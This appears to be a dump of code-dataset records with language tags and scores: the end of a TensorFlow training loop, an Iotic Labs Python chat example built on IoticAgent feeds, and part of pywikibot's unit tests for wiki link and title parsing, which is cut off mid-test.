_, loss, summaries, global_step = model.run_train_step(sess, batch, epoch)
summary_writer.add_summary(summaries, global_step)
total_loss += loss
loss_per_epoch = total_loss / (train_batcher._batch_number * train_batcher._batch_size)
print("train\t{0}\tl:{1}\t\t".format(epoch, loss_per_epoch))
if epoch % FLAGS.eval_every == 0:
accuracy, partial_accuracy = model.run_eval_step(sess, dataset_dev, dev_num_steps)
print("dev\t{0}\ta:{1}\tpa:{2}".format(epoch, accuracy, partial_accuracy))
if partial_accuracy > best:
model.save_model(sess, directory_save + "model.checkpoint",
global_step=global_step)
best = partial_accuracy
if partial_accuracy == 1.0:
_acc, _p_acc = model.run_eval_step(sess, dataset_test, test_num_steps)
print("test\t{0}\ta:{1}\tpa:{2}".format(epoch, _acc, _p_acc))
exit(0)
# accuracy, partial_accuracy = model.run_eval_step(
# sess, datasets.test, test_stack_size)
# print("test {0}\t{1}\t{2}\t{3}".format(epoch, 'x', accuracy, partial_accuracy))
summary_acc = tf.Summary(
value=[tf.Summary.Value(tag="accuracy/accuracy", simple_value=accuracy)])
summary_part_acc = tf.Summary(
value=[tf.Summary.Value(tag="accuracy/partial_accuracy",
simple_value=partial_accuracy)])
summary_writer.add_summary(summary_acc, global_step)
summary_writer.add_summary(summary_part_acc, global_step)
summary_writer.flush()
if __name__ == "__main__":
tf.app.run()
|
en
| 0.381161
|
# logging.basicConfig(level=logging.DEBUG) # num_steps = seq_length * 6 + 6 # stack_size = seq_length * 2 + 10 # # seq_len = 1 # num_steps = 12 # stack_size = 12 # seq_length = 3 # num_steps = 24 # stack_size = 16 # seq_length = 10 # num_steps = 66 # stack_size = 30 # choose add - learning rate 0.05 # calculate value_size automatically # with tf.Session() as sess: # model.load_model(sess, "./tmp/add/checkpoints/{0}/".format(FLAGS.id)) # print('tst') # # dataset_test = load_single_dataset('./data/add/{0}/test.txt'.format(FLAGS.id)) # def num_steps(x): # return x * 8 + 6 # # accuracy, partial_accuracy = model.run_eval_step( # sess, dataset_test, num_steps(dataset_test.input_seq[:, -1]. max())) # print("{0}\t{1}\t{2}".format('test', accuracy, partial_accuracy)) # # exit(0) # where to save checkpoints for test set calculation # directory_save needs to exist # run max_epochs times # accuracy, partial_accuracy = model.run_eval_step( # sess, datasets.test, test_stack_size) # print("test {0}\t{1}\t{2}\t{3}".format(epoch, 'x', accuracy, partial_accuracy))
| 2.429155
| 2
|
iotic_chat/main.py
|
aniknarayan/iotic_work
| 0
|
6627560
|
<filename>iotic_chat/main.py
# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/Iotic-Labs/py-application-examples/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# PYTHON2 COMPATIBILITY -----------------------------------------------------------------------------------------------
from __future__ import unicode_literals, print_function # pylint: disable=unused-import
# LOGGING -------------------------------------------------------------------------------------------------------------
# Logging set to only CRITICAL messages by default. To see more, use logging.INFO, or to see loads, logging.DEBUG
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)03d %(levelname)s [%(name)s] {%(threadName)s} %(message)s',
level=logging.CRITICAL)
# IMPORTS -------------------------------------------------------------------------------------------------------------
import sys
from functools import partial
# IOTIC AGENT IMPORTS -------------------------------------------------------------------------------------------------
from IoticAgent import IOT
from IoticAgent import Datatypes
# THING SETUP -----------------------------------------------------------------------------------------------
# Adds basic chat tags to the new Thing
def add_tags(my_thing):
# Delete thing's tags
my_thing_tags = my_thing.list_tag()
if any(my_thing_tags):
my_thing.delete_tag(my_thing_tags['en'])
# Add new tags
tags = ['messenger']
my_thing.create_tag(tags)
# Adds basic metadata to the new Thing
def add_metadata_information(thing_meta):
# Thing visible name in Iotic Space
thing_meta.set_label('iotic_communicator')
# Thing description
thing_meta.set_description('basic thing to chat with other thing in Iotic Space')
# Initialize a new thing assigned to the Agent
def setup_thing(client, name):
print("Connecting to your thing", sep=' ', end=' ... ')
sys.stdout.flush()
# 1- Get/Create a thing with the given name
my_thing = client.create_thing(name)
# 2-Add tags for searching
add_tags(my_thing)
# 3-Add metada to the thing
with my_thing.get_meta() as meta_thing:
add_metadata_information(meta_thing)
# 4-Makes the thing visible
my_thing.set_public()
return my_thing
# Setups the feed for share information with others
def setup_thing_feed(my_thing):
# 1-Get feed from thing
my_feed = my_thing.create_feed('message_data')
# 2-Put metadata information
with my_feed.get_meta() as meta_feed:
meta_feed.set_label('Message data')
meta_feed.set_description('data sended in the messages')
# 3-Create skeleton structure
my_feed.create_value('user', Datatypes.STRING, lang='en', description="Name of the user")
my_feed.create_value('message', Datatypes.STRING, lang='en', description="Message sent by the user")
return my_feed
# Attachs a callback function to each feed
def connect_subscriptions(client, my_thing, callback_function):
# Get tags to search other thing with same tags
my_thing_tags = my_thing.list_tag()
string_tags = ' '.join(my_thing_tags['en'])
iotic_chat_things = client.search_reduced(text=string_tags)
# Delete our thing from the search result if exists
if my_thing.guid in iotic_chat_things:
del iotic_chat_things[my_thing.guid]
print("Connecting subscriptions")
sys.stdout.flush()
# Get global Point ID (gpid) from this information and wire up the follow to the callback
for key in iotic_chat_things:
for feed_guid, feed_type in iotic_chat_things[key].items():
if feed_type == 'Feed':
my_thing.follow(feed_guid, None, callback_parsed=callback_function)
# This callback is going to be called everytime we recieve data
def follow_feed_callback(data):
values = data['parsed'].values
text = '>' + values.user + ': ' + values.message
print(text)
# Sends feed data
def share_data(my_feed, my_feed_skeleton):
my_feed.share(my_feed_skeleton)
# Send disconected message
def share_goodbye_data(my_feed, my_feed_skeleton):
my_feed_skeleton.values.message = my_feed_skeleton.values.user + ' left the the chat'
my_feed_skeleton.values.user = ''
my_feed.share(my_feed_skeleton)
# This fuction is called when someone is subscribed to your thing
def incoming_subscription_callback(data, client=None):
print('New user is subscribed')
# Your thing with new subscriptor
subscribed_thing = client.create_thing(data['entityLid'])
# Your feed's thing
thing_feed = subscribed_thing.create_feed(data['lid'])
# Gets all the followers even the new one
feed_followers = thing_feed.list_followers()
for key in feed_followers:
# Get external things subscribed to you
external_thing = client.describe(feed_followers[key])
# Get the points from external thing
external_thing_points = external_thing['meta']['points']
for point in external_thing_points:
if point['type'] == 'Feed':
# Attach callback to see new messages
subscribed_thing.follow(point['guid'], None, callback_parsed=follow_feed_callback)
# MAIN ------------------------------------------------------------------------------------------------------
def main():
# Get the main arguments ( Agent and Thing )
agent_file = sys.argv[1]
thing_local_name = sys.argv[2]
print("Connecting to your agent", sep=' ', end=' ... ')
sys.stdout.flush()
with IOT.Client(config=agent_file) as client:
my_thing = setup_thing(client, thing_local_name)
my_feed = setup_thing_feed(my_thing)
my_feed_skeleton = my_feed.get_template()
connect_subscriptions(client, my_thing, follow_feed_callback)
# Create a new function which recieves a iotic-client
manage_new_subsciptions = partial(incoming_subscription_callback, client=client)
client.register_callback_subscription(manage_new_subsciptions)
print("///////////////////////////////")
print("// Welcome to the Iotic Chat //")
print("///////////////////////////////")
print("Write /quit to exit")
user = input('Type your nickname: ')
my_feed_skeleton.values.user = user
while True:
try:
text = input()
my_feed_skeleton.values.message = text
print()
if text != '/quit':
share_data(my_feed, my_feed_skeleton)
else:
share_goodbye_data(my_feed, my_feed_skeleton)
break
except KeyboardInterrupt:
share_goodbye_data(my_feed, my_feed_skeleton)
break
# # RUN --------------------------------------------------------------------------------------------------
if __name__ == '__main__':
main()
# # END --------------------------------------------------------------------------------------------------
|
<filename>iotic_chat/main.py
# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/Iotic-Labs/py-application-examples/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# PYTHON2 COMPATIBILITY -----------------------------------------------------------------------------------------------
from __future__ import unicode_literals, print_function # pylint: disable=unused-import
# LOGGING -------------------------------------------------------------------------------------------------------------
# Logging set to only CRITICAL messages by default. To see more, use logging.INFO, or to see loads, logging.DEBUG
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)03d %(levelname)s [%(name)s] {%(threadName)s} %(message)s',
level=logging.CRITICAL)
# IMPORTS -------------------------------------------------------------------------------------------------------------
import sys
from functools import partial
# IOTIC AGENT IMPORTS -------------------------------------------------------------------------------------------------
from IoticAgent import IOT
from IoticAgent import Datatypes
# THING SETUP -----------------------------------------------------------------------------------------------
# Adds basic chat tags to the new Thing
def add_tags(my_thing):
# Delete thing's tags
my_thing_tags = my_thing.list_tag()
if any(my_thing_tags):
my_thing.delete_tag(my_thing_tags['en'])
# Add new tags
tags = ['messenger']
my_thing.create_tag(tags)
# Adds basic metadata to the new Thing
def add_metadata_information(thing_meta):
# Thing visible name in Iotic Space
thing_meta.set_label('iotic_communicator')
# Thing description
thing_meta.set_description('basic thing to chat with other thing in Iotic Space')
# Initialize a new thing assigned to the Agent
def setup_thing(client, name):
print("Connecting to your thing", sep=' ', end=' ... ')
sys.stdout.flush()
# 1- Get/Create a thing with the given name
my_thing = client.create_thing(name)
# 2-Add tags for searching
add_tags(my_thing)
# 3-Add metada to the thing
with my_thing.get_meta() as meta_thing:
add_metadata_information(meta_thing)
# 4-Makes the thing visible
my_thing.set_public()
return my_thing
# Setups the feed for share information with others
def setup_thing_feed(my_thing):
# 1-Get feed from thing
my_feed = my_thing.create_feed('message_data')
# 2-Put metadata information
with my_feed.get_meta() as meta_feed:
meta_feed.set_label('Message data')
meta_feed.set_description('data sended in the messages')
# 3-Create skeleton structure
my_feed.create_value('user', Datatypes.STRING, lang='en', description="Name of the user")
my_feed.create_value('message', Datatypes.STRING, lang='en', description="Message sent by the user")
return my_feed
# Attachs a callback function to each feed
def connect_subscriptions(client, my_thing, callback_function):
# Get tags to search other thing with same tags
my_thing_tags = my_thing.list_tag()
string_tags = ' '.join(my_thing_tags['en'])
iotic_chat_things = client.search_reduced(text=string_tags)
# Delete our thing from the search result if exists
if my_thing.guid in iotic_chat_things:
del iotic_chat_things[my_thing.guid]
print("Connecting subscriptions")
sys.stdout.flush()
# Get global Point ID (gpid) from this information and wire up the follow to the callback
for key in iotic_chat_things:
for feed_guid, feed_type in iotic_chat_things[key].items():
if feed_type == 'Feed':
my_thing.follow(feed_guid, None, callback_parsed=callback_function)
# This callback is going to be called everytime we recieve data
def follow_feed_callback(data):
values = data['parsed'].values
text = '>' + values.user + ': ' + values.message
print(text)
# Sends feed data
def share_data(my_feed, my_feed_skeleton):
my_feed.share(my_feed_skeleton)
# Send disconected message
def share_goodbye_data(my_feed, my_feed_skeleton):
my_feed_skeleton.values.message = my_feed_skeleton.values.user + ' left the the chat'
my_feed_skeleton.values.user = ''
my_feed.share(my_feed_skeleton)
# This fuction is called when someone is subscribed to your thing
def incoming_subscription_callback(data, client=None):
print('New user is subscribed')
# Your thing with new subscriptor
subscribed_thing = client.create_thing(data['entityLid'])
# Your feed's thing
thing_feed = subscribed_thing.create_feed(data['lid'])
# Gets all the followers even the new one
feed_followers = thing_feed.list_followers()
for key in feed_followers:
# Get external things subscribed to you
external_thing = client.describe(feed_followers[key])
# Get the points from external thing
external_thing_points = external_thing['meta']['points']
for point in external_thing_points:
if point['type'] == 'Feed':
# Attach callback to see new messages
subscribed_thing.follow(point['guid'], None, callback_parsed=follow_feed_callback)
# MAIN ------------------------------------------------------------------------------------------------------
def main():
# Get the main arguments ( Agent and Thing )
agent_file = sys.argv[1]
thing_local_name = sys.argv[2]
print("Connecting to your agent", sep=' ', end=' ... ')
sys.stdout.flush()
with IOT.Client(config=agent_file) as client:
my_thing = setup_thing(client, thing_local_name)
my_feed = setup_thing_feed(my_thing)
my_feed_skeleton = my_feed.get_template()
connect_subscriptions(client, my_thing, follow_feed_callback)
# Create a new function which recieves a iotic-client
manage_new_subsciptions = partial(incoming_subscription_callback, client=client)
client.register_callback_subscription(manage_new_subsciptions)
print("///////////////////////////////")
print("// Welcome to the Iotic Chat //")
print("///////////////////////////////")
print("Write /quit to exit")
user = input('Type your nickname: ')
my_feed_skeleton.values.user = user
while True:
try:
text = input()
my_feed_skeleton.values.message = text
print()
if text != '/quit':
share_data(my_feed, my_feed_skeleton)
else:
share_goodbye_data(my_feed, my_feed_skeleton)
break
except KeyboardInterrupt:
share_goodbye_data(my_feed, my_feed_skeleton)
break
# # RUN --------------------------------------------------------------------------------------------------
if __name__ == '__main__':
main()
# # END --------------------------------------------------------------------------------------------------
|
en
| 0.594768
|
# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://github.com/Iotic-Labs/py-application-examples/blob/master/LICENSE # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # PYTHON2 COMPATIBILITY ----------------------------------------------------------------------------------------------- # pylint: disable=unused-import # LOGGING ------------------------------------------------------------------------------------------------------------- # Logging set to only CRITICAL messages by default. To see more, use logging.INFO, or to see loads, logging.DEBUG # IMPORTS ------------------------------------------------------------------------------------------------------------- # IOTIC AGENT IMPORTS ------------------------------------------------------------------------------------------------- # THING SETUP ----------------------------------------------------------------------------------------------- # Adds basic chat tags to the new Thing # Delete thing's tags # Add new tags # Adds basic metadata to the new Thing # Thing visible name in Iotic Space # Thing description # Initialize a new thing assigned to the Agent # 1- Get/Create a thing with the given name # 2-Add tags for searching # 3-Add metada to the thing # 4-Makes the thing visible # Setups the feed for share information with others # 1-Get feed from thing # 2-Put metadata information # 3-Create skeleton structure # Attachs a callback function to each feed # Get tags to search other thing with same tags # Delete our thing from the search result if exists # Get global Point ID (gpid) from this information and wire up the follow to the callback # This callback is going to be called everytime we recieve data # Sends feed data # Send disconected message # This fuction is called when someone is subscribed to your thing # Your thing with new subscriptor # Your feed's thing # Gets all the followers even the new one # Get external things subscribed to you # Get the points from external thing # Attach callback to see new messages # MAIN ------------------------------------------------------------------------------------------------------ # Get the main arguments ( Agent and Thing ) # Create a new function which recieves a iotic-client # # RUN -------------------------------------------------------------------------------------------------- # # END --------------------------------------------------------------------------------------------------
| 1.798307
| 2
|
llcv/models/detectors/__init__.py
|
mtli/llcv
| 1
|
6627561
|
<gh_stars>1-10
from .tv_dets import TVFasterRCNN
|
from .tv_dets import TVFasterRCNN
|
none
| 1
| 1.079502
| 1
|
|
tests/link_tests.py
|
notconfusing/pywikibot-fr-welcome-bot
| 1
|
6627562
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
"""Test Link functionality."""
#
# (C) Pywikibot team, 2014-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import re
import pywikibot
from pywikibot import config2 as config
from pywikibot import Site
from pywikibot.page import Link, Page, SiteLink
from pywikibot.site import Namespace
from pywikibot.exceptions import Error, InvalidTitle
from tests.aspects import (
unittest,
AlteredDefaultSiteTestCase as LinkTestCase,
DefaultDrySiteTestCase,
WikimediaDefaultSiteTestCase,
TestCase,
)
class TestCreateSeparated(DefaultDrySiteTestCase):
"""Test C{Link.create_separated}."""
def _test_link(self, link, page, section, label):
"""Test the separate contents of the link."""
self.assertIs(link.site, self.site)
self.assertEqual(link.title, page)
if section is None:
self.assertIsNone(link.section)
else:
self.assertEqual(link.section, section)
if label is None:
self.assertIsNone(link.anchor)
else:
self.assertEqual(link.anchor, label)
def test(self):
"""Test combinations of parameters."""
self._test_link(Link.create_separated('Foo', self.site),
'Foo', None, None)
self._test_link(Link.create_separated('Foo', self.site, section='Bar'),
'Foo', 'Bar', None)
self._test_link(Link.create_separated('Foo', self.site, label='Baz'),
'Foo', None, 'Baz')
self._test_link(Link.create_separated('Foo', self.site, section='Bar',
label='Baz'),
'Foo', 'Bar', 'Baz')
# ---- Tests checking if the parser does (not) accept (in)valid titles
class TestLink(DefaultDrySiteTestCase):
"""
Test parsing links with DrySite.
The DrySite is using the builtin namespaces which behaviour is controlled
in this repository so namespace aware tests do work, even when the actual
default site is using completely different namespaces.
"""
def test_valid(self):
"""Test that valid titles are correctly normalized."""
site = self.get_site()
title_tests = ['Sandbox', 'A "B"', "A 'B'", '.com', '~', '"', "'",
'Foo/.../Sandbox', 'Sandbox/...', 'A~~', 'X' * 252]
for title in title_tests:
with self.subTest(title=title):
self.assertEqual(Link(title, site).title, title)
self.assertEqual(Link('Talk:Sandbox', site).title, 'Sandbox')
self.assertEqual(Link('Talk:Foo:Sandbox', site).title, 'Foo:Sandbox')
self.assertEqual(Link('File:Example.svg', site).title, 'Example.svg')
self.assertEqual(Link('File_talk:Example.svg', site).title,
'Example.svg')
self.assertEqual(Link(':A', site).title, 'A')
# Length is 256 total, but only title part matters
self.assertEqual(Link('Category:' + 'X' * 248, site).title, 'X' * 248)
self.assertEqual(Link('A%20B', site).title, 'A B')
self.assertEqual(Link('A é B', site).title, 'A é B')
self.assertEqual(Link('A é B', site).title, 'A é B')
self.assertEqual(Link('A é B', site).title, 'A é B')
self.assertEqual(Link('A B', site).title, 'A B')
self.assertEqual(Link('A   B', site).title, 'A B')
anchor_link = Link('A | B', site)
self.assertEqual(anchor_link.title, 'A')
self.assertEqual(anchor_link.anchor, ' B')
section_link = Link('A%23B', site)
self.assertEqual(section_link.title, 'A')
self.assertEqual(section_link.section, 'B')
def test_invalid(self):
"""Test that invalid titles raise InvalidTitle exception."""
exception_message_regex = (
r'^The link does not contain a page title$'
)
texts_to_test = ['', ':', '__ __', ' __ ']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
exception_message_regex):
Link(text, self.get_site()).parse()
# Bad characters forbidden regardless of wgLegalTitleChars
def generate_contains_illegal_chars_exc_regex(text):
exc_regex = (
r'^(u|)\'{}\' contains illegal char\(s\) (u|)\'{}\'$'
.format(re.escape(text), re.escape(text[2])))
return exc_regex
texts_to_test = ['A [ B', 'A ] B', 'A { B', 'A } B', 'A < B', 'A > B']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_contains_illegal_chars_exc_regex(text)):
Link(text, self.get_site()).parse()
# URL encoding
# %XX is understood by wikimedia but not %XXXX
with self.assertRaisesRegex(
InvalidTitle,
r'^(u|)\'A%23B\' contains illegal char\(s\) (u|)\'%23\'$'):
Link('A%2523B', self.get_site()).parse()
# A link is invalid if their (non-)talk page would be in another
# namespace than the link's "other" namespace
with self.assertRaisesRegex(
InvalidTitle,
(r'The \(non-\)talk page of (u|)\'Talk:File:Example.svg\''
r' is a valid title in another namespace.')):
Link('Talk:File:Example.svg', self.get_site()).parse()
# Directory navigation
def generate_contains_dot_combinations_exc_regex(text):
exc_regex = (r'^\(contains \. / combinations\): (u|)\'{}\'$'
.format(re.escape(text)))
return exc_regex
texts_to_test = ['.', '..', './Sandbox', '../Sandbox', 'Foo/./Sandbox',
'Foo/../Sandbox', 'Sandbox/.', 'Sandbox/..']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_contains_dot_combinations_exc_regex(text)):
Link(text, self.get_site()).parse()
# Tilde
def generate_contains_tilde_exc_regex(text):
exc_regex = r'^\(contains ~~~\): (u|)\'%s\'$' % re.escape(text)
return exc_regex
texts_to_test = ['A ~~~ Name', 'A ~~~~ Signature', 'A ~~~~~ Timestamp']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_contains_tilde_exc_regex(text)):
Link(text, self.get_site()).parse()
# Overlength
def generate_overlength_exc_regex(text):
exc_regex = r'^\(over 255 bytes\): (u|)\'%s\'$' % re.escape(text)
return exc_regex
texts_to_test = [('x' * 256), ('Invalid:' + 'X' * 248)]
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_overlength_exc_regex(text)):
Link(text, self.get_site()).parse()
# Namespace prefix without actual title
def generate_has_no_title_exc_regex(text):
exc_regex = r'^(u|)\'{}\' has no title\.$'.format(re.escape(text))
return exc_regex
texts_to_test = ['Talk:', 'Category: ', 'Category: #bar']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_has_no_title_exc_regex(text.strip())):
Link(text, self.get_site()).parse()
def test_relative(self):
"""Test that relative links are handled properly."""
# Subpage
page = Page(self.get_site(), 'Foo')
rel_link = Link('/bar', page)
self.assertEqual(rel_link.title, 'Foo/bar')
self.assertEqual(rel_link.site, self.get_site())
# Subpage of Page with section
page = Page(self.get_site(), 'Foo#Baz')
rel_link = Link('/bar', page)
self.assertEqual(rel_link.title, 'Foo/bar')
self.assertEqual(rel_link.site, self.get_site())
# Non-subpage link text beginning with slash
abs_link = Link('/bar', self.get_site())
self.assertEqual(abs_link.title, '/bar')
class Issue10254TestCase(DefaultDrySiteTestCase):
"""Test T102461 (Python issue 10254)."""
def setUp(self):
"""Set up test case."""
super(Issue10254TestCase, self).setUp()
self._orig_unicodedata = pywikibot.page.unicodedata
def tearDown(self):
"""Tear down test case."""
pywikibot.page.unicodedata = self._orig_unicodedata
super(Issue10254TestCase, self).tearDown()
def test_no_change(self):
"""Test T102461 (Python issue 10254) is not encountered."""
title = 'Li̍t-sṳ́'
link = Link(title, self.site)
self.assertEqual(link.title, 'Li̍t-sṳ́')
# ---- The first set of tests are explicit links, starting with a ':'.
class TestPartiallyQualifiedExplicitLinkSameSiteParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_code(self):
"""Test ':wikipedia:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_partially_qualified_NS1_code(self):
"""Test ':wikipedia:Talk:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
def test_partially_qualified_NS0_family(self):
"""Test ':en:Main Page' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_family(self):
"""Test ':en:Talk:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestPartiallyQualifiedExplicitLinkDifferentCodeParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_family(self):
"""Test ':en:Main Page' on dewp is namespace 0."""
config.mylang = 'de'
config.family = 'wikipedia'
link = Link(':en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_family(self):
"""Test ':en:Talk:Main Page' on dewp is namespace 1."""
config.mylang = 'de'
config.family = 'wikipedia'
link = Link(':en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestPartiallyQualifiedExplicitLinkDifferentFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_code(self):
"""Test ':wikipedia:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_code(self):
"""Test ':wikipedia:Talk:Main Page' on enws is ns 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedSameNamespaceFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_namespace_vs_family(self):
"""Test namespace is selected before family."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.title, 'En:Main Page')
self.assertEqual(link.namespace, 4)
link = Link(':wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'En:Talk:Main Page')
self.assertEqual(link.namespace, 4)
class TestFullyQualifiedExplicitLinkSameFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':en:wikipedia:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS1_code(self):
"""Test ':en:wikipedia:Talk:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
class TestFullyQualifiedExplicitLinkDifferentFamilyParser(LinkTestCase):
"""Test link to a different family."""
sites = {
'enws': {
'family': 'wikisource',
'code': 'en'
},
'enwp': {
'family': 'wikipedia',
'code': 'en'
}
}
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':en:wikipedia:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test ':en:wikipedia:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
def test_fully_qualified_NS0_family(self):
"""Test ':wikipedia:en:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family(self):
"""Test ':wikipedia:en:Talk:Main Page' on enws is namespace 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedExplicitLinkNoLangConfigFamilyParser(LinkTestCase):
"""Test link from family without lang code to a different family."""
sites = {
'wikidata': {
'family': 'wikidata',
'code': 'wikidata'
},
'enwp': {
'family': 'wikipedia',
'code': 'en'
}
}
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':en:wikipedia:Main Page' on wikidata is namespace 4."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link(':en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS1_code(self):
"""Test ':en:wikipedia:Talk:Main Page' on wikidata is namespace 4."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link(':en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS0_family(self):
"""Test ':wikipedia:en:Main Page' on wikidata is namespace 0."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link(':wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family(self):
"""Test ':wikipedia:en:Talk:Main Page' on wikidata is namespace 1."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link(':wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedNoLangFamilyExplicitLinkParser(LinkTestCase):
"""Test wikibase links."""
sites = {
'wikidata': {
'family': 'wikidata',
'code': 'wikidata'
},
'enwp': {
'family': 'wikipedia',
'code': 'en'
},
'test.wp': {
'family': 'wikipedia',
'code': 'test'
},
}
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':testwiki:wikidata:Q6' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':testwiki:wikidata:Q6')
link.parse()
self.assertEqual(link.site, self.get_site('wikidata'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test ':testwiki:wikidata:Talk:Q6' on enwp is namespace 1."""
